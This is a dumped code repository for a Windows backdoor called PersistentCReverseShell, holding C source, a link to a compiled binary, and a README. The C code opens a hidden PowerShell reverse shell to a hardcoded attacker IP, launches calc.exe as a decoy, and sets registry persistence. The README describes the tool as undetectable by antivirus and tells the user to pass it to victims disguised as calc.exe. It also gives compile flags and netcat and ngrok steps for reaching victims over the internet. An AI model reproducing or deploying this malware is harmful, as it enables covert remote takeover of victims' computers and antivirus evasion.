├── reverse.exe
├── creverse.c
└── README.md

/reverse.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/1captainnemo1/PersistentCReverseShell/HEAD/reverse.exe
--------------------------------------------------------------------------------

/creverse.c:
--------------------------------------------------------------------------------
```c
// AUTHOR : #Captain_Nemo
#include
#include
#include
#include
#include

#pragma comment(lib, "Ws2_32.lib")
#define DEF_BUFF 2048

void rsh(char* server, int Port)
{
    while(1)
    {
        WSADATA wsaData;
        SOCKET Winsock;
        struct sockaddr_in address;
        char Rec_dat[DEF_BUFF];
        STARTUPINFO process_startup;
        PROCESS_INFORMATION p_info;

        WSAStartup(MAKEWORD(2,2), &wsaData);
        Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

        address.sin_family = AF_INET;
        address.sin_port = htons(Port);
        address.sin_addr.s_addr =inet_addr(server);

        WSAConnect(Winsock,(SOCKADDR*)&address, sizeof(address),NULL,NULL,NULL,NULL);
        if (WSAGetLastError() == 0)
        {
            memset(&process_startup, 0, sizeof(process_startup));
            char proc[] = "powershell.exe -WindowStyle Hidden";
            process_startup.cb=sizeof(process_startup);
            process_startup.dwFlags=STARTF_USESTDHANDLES;
            process_startup.hStdInput = process_startup.hStdOutput = process_startup.hStdError = (HANDLE)Winsock;
            CreateProcess(NULL, proc, NULL, NULL, TRUE, 0, NULL, NULL, &process_startup, &p_info);
            // WaitForSingleObject(p_info.hProcess, INFINITE);
            // CloseHandle(p_info.hProcess);
            // CloseHandle(p_info.hThread);
            //memset(Rec_dat, 0, sizeof(Rec_dat));
            //int Rec_code = recv(Winsock, Rec_dat, DEF_BUFF, 0);
            // if (Rec_code <= 0)
            // {
            //     closesocket(Winsock);
            //     WSACleanup();
            //     continue;
            // } // end if
            // if (strcmp(Rec_dat, "exit\n") == 0)
            //{
            exit(0);
        } // end if
        exit(0);
    } // end while
} // end function rsh

int main()
{
    char h[] = "192.168.225.197";
    int p = 8080;
    system("start C:\\WINDOWS\\System32\\calc.exe"); // fire decoy
    system("cmd /c copy .\\reverse.exe %appdata%"); // copy malware to appdata
    system("cmd /c REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V \"Secure\" /t REG_SZ /F /D \"%appdata%\\reverse.exe"); //add registry persistence
    rsh(h, p); // call rsh function
    return 0;
} // end main
```
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# PersistentCReverseShell

A FUD Backdoor Reverse Shell coded in C for any Windows distribution, that will fire a decoy app in the foreground while connecting back to the attacker machine as a silent background process.

In addition to this, the malware will copy itself into the %appdata% folder and make itself persistent ON BOOT by adding a startup registry key in: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run

Thus at every boot, the malware will start a callback to the attacker machine, and will connect, provided the listener is on.

Oh, did I mention that the shell that YOU WILL GET WILL BE A "POWERSHELL"!!!!

Change the IP to the attacker machine's IP and the port number to your desired port number and compile using:

```
i686-w64-mingw32-gcc creverse.c -o reverse.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
```

Pass it to the attacker, stating that this is an updated version of calc.exe. You can scan the application with your AV solutions, if you want, and I am pretty sure that 98% of the AV solutions will NOT detect it. It has passed the check of Windows Defender with an updated definition file.

PLEASE DO NOT UPLOAD TO VIRUSTOTAL !!!

Start a netcat listener on port 8080 using nc -lvp 8080

Once the victim executes the app, the decoy process (calc.exe) will fire up in the foreground on the victim's end, while a reverse shell will fire up in the background, giving you a POWERSHELL PROMPT on the attacking machine.

PS: Even if the victim decides to exit calc.exe, the reverse shell session will stay on, as they are running as 2 different processes.

Cheers

#Captain_Nemo

PS: For WAN exploits, fire up ngrok with the following parameters (in case port forwarding is disallowed by your ISP): ./ngrok tcp 8080

```
Region          United States (us)
Web Interface   http://127.0.0.1:4040
Forwarding      tcp://0.tcp.ngrok.io:19864 -> localhost:8080

Connections     ttl     opn     rt1     rt5     p50     p90
                0       0       0.00    0.00    0.00    0.00
```

Ping 0.tcp.ngrok.io at least 6-7 times to get a stable mirror IP and port. When you see that the IP and the port numbers are the same after the last 5-6 pings, use that IP and port in the code > compile the code > pass it to the victim machine > make sure ngrok is NOT interrupted on the attacker machine, as a new ngrok session will grab a new IP and port > start nc -lvp 8080 on the attacker system > execute the payload on the victim machine > get a session over WAN/Internet on the attacker machine.

CHEERS

#CAPTAIN_NEMO
https://youtu.be/nfK-3sYD4uE
--------------------------------------------------------------------------------